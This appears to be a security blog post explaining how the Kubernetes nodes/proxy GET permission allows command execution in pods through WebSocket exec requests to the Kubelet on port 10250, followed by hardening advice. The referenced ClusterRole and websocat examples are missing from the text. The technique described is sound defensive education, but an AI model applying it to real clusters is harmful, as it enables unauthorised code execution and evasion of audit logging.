Understanding the Kubernetes nodes/proxy GET RCE “Vulnerability” (And Why It’s Working as Intended)
When you think of a "security bug," you usually imagine something getting fixed — patches, CVEs, frantic updates… But what if the behavior you're calling a bug is actually working exactly the way the project maintainers intended?
That's the situation with an interesting Kubernetes authorization behavior involving the nodes/proxy GET permission. What looks like a Remote Code Execution (RCE) vector is actually a side-effect of how Kubernetes implements authorization for certain API paths — particularly the Kubelet's exec interfaces over WebSockets.
Let's unpack what's happening, why it matters, and most importantly: how it works.
What Does nodes/proxy GET Actually Allow?
Kubernetes Role-Based Access Control (RBAC) permissions are defined with resources and verbs. For example:
- pods/exec CREATE - permits creating an exec session in a pod
- pods/log GET - permits reading logs
But the nodes/proxy resource is a bit different: it's used to proxy requests from the API server to the Kubelet itself. Many monitoring tools require nodes/proxy GET just to fetch metrics or logs on a node.
Here's an example of such a ClusterRole:
Sounds innocent enough — read only! Right?
Where Things Get Weird: exec Over WebSockets
To understand the gotcha, it helps to know how interactive exec works:
- The Kubelet supports exec via a WebSocket connection
- WebSockets start with an HTTP GET request that upgrades the connection
- Kubernetes RBAC makes its authorization decision based on the initial HTTP verb and path
That's the crux of the issue. When a client tries to create an exec session over WebSockets, the initial connection is a GET, even though the ultimate intention is to run commands (something that logically feels like a write).
Because of this, Kubernetes treats the request like a GET and checks if the user has nodes/proxy GET, even though what they're trying to do — execute commands — should logically require create/exec permissions.
The Result: Exec Without CREATE
With only nodes/proxy GET permissions, and access to the node's Kubelet (typically port 10250), an attacker/service account can effectively:
- Run arbitrary commands in any Pod on that node
Here's an example invocation using websocat:
The result?
Boom — you're executing commands inside a container without having pods/exec CREATE! That's powerful (and scary).
So Is This a "Bug"?
This behavior was reported through the Kubernetes security disclosure process, but the team ultimately closed it as design-by-intent — meaning Kubernetes is working exactly the way it was designed.
The RBAC model in Kubernetes:
- Maps HTTP verbs (GET, POST, etc.) to RBAC verbs (get, create, etc.)
- Makes decisions based on the initial HTTP request — even if the underlying action (exec) is more than a simple GET
Because WebSockets start with a GET, the authorization check uses the GET verb, and therefore anything allowed by that permission may also open the door to actions that should require more powerful verbs.
Why It Happens
Two main implementation details collide here:
🔹 WebSocket Handshake Uses GET
Interactive features like exec/settty use WebSockets for bi-directional streaming. But WebSockets must begin with an HTTP GET handshake — which then gets "upgraded". Kubernetes RBAC doesn't re-check after the upgrade.
🔹 nodes/proxy Covers "Proxy" Paths
When Kubernetes doesn't have a specific mapping for a path (like /exec), it classifies it under nodes/proxy, meaning that if you have nodes/proxy GET, the authorization check passes.
Real-World Impact
This isn't just a theoretical edge case:
- Many common Helm charts request nodes/proxy GET so tools can fetch metrics and logs
- A compromised service account — or one with overly-broad access — could abuse this to gain exec access to pods they shouldn't control
- There's no automatic audit logging in Kubernetes for this path, making detection harder
Yet the Kubernetes team didn't change how this works because fixing it would require deeper protocol semantics — something that's difficult to resolve without breaking existing functionality.
What Can You Do About It?
Because this behavior is currently intentional:
Audit Permissions Carefully
Don't grant nodes/proxy GET unless absolutely necessary.
Use Least Privilege
Ensure service accounts are scoped tightly — especially those related to monitoring or metrics gathering.
Monitor Kubelet Access
Restrict access to the Kubelet API on port 10250 wherever possible.
Comments
Post a Comment